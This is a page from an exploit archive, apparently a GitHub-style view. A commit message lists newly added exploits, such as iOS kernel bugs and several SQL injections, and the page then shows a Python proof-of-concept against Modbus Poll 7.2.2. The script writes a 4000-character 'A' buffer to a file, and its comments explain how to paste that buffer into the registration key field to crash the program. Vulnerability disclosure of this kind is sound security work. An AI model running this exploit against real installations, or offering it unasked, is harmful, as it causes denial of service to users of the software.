
17 changes to exploits/shellcodes Modbus Poll 7.2.2 - Denial of Service (PoC) AudaCity 2.3 - Denial of Service (PoC) Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit) Countly - Persistent Cross-Site Scripting Countly - Cross-Site Scripting MySQL Edit Table 1.0 - 'id' SQL Injection School ERP Ultimate 2018 - Arbitrary File Download Oracle Siebel CRM 8.1.1 - CSV Injection The Open ISES Project 3.30A - 'tick_lat' SQL Injection School ERP Ultimate 2018 - 'fid' SQL Injection eNdonesia Portal 8.7 - 'artid' SQL Injection The Open ISES Project 3.30A - Arbitrary File Download Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection
27 lines
No EOL
1 KiB
Python
Executable file
27 lines
No EOL
1 KiB
Python
Executable file
# Exploit Title: Modbus Poll 7.2.2 - Denial of Service (PoC)
|
|
# Discovery by: Cemal Cihad ÇİFTÇİ
|
|
# Discovery Date: 2018-10-19
|
|
# Tested Version: 7.2.2
|
|
# Vulnerability Type: DOS
|
|
# Tested on OS: Windows XP Professional Service Pack 3
|
|
# Vendor Homepage: https://www.modbustools.com
|
|
# Download Link: https://www.modbustools.com/download.html
|
|
|
|
# Steps to Reproduce: Run the python exploit script, it will create a new
|
|
# file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
|
|
# Now start the program. Now when you are inside of the program click Connection button and
|
|
# click "connect". It will ask you for registration key. In the field: "Registration Key"
|
|
# paste the copied content from "exploit.txt".
|
|
# Now click "OK" and see a crash!
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = "A" * 4000
|
|
try:
|
|
f=open("exploit.txt","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
|
f.write(buffer)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |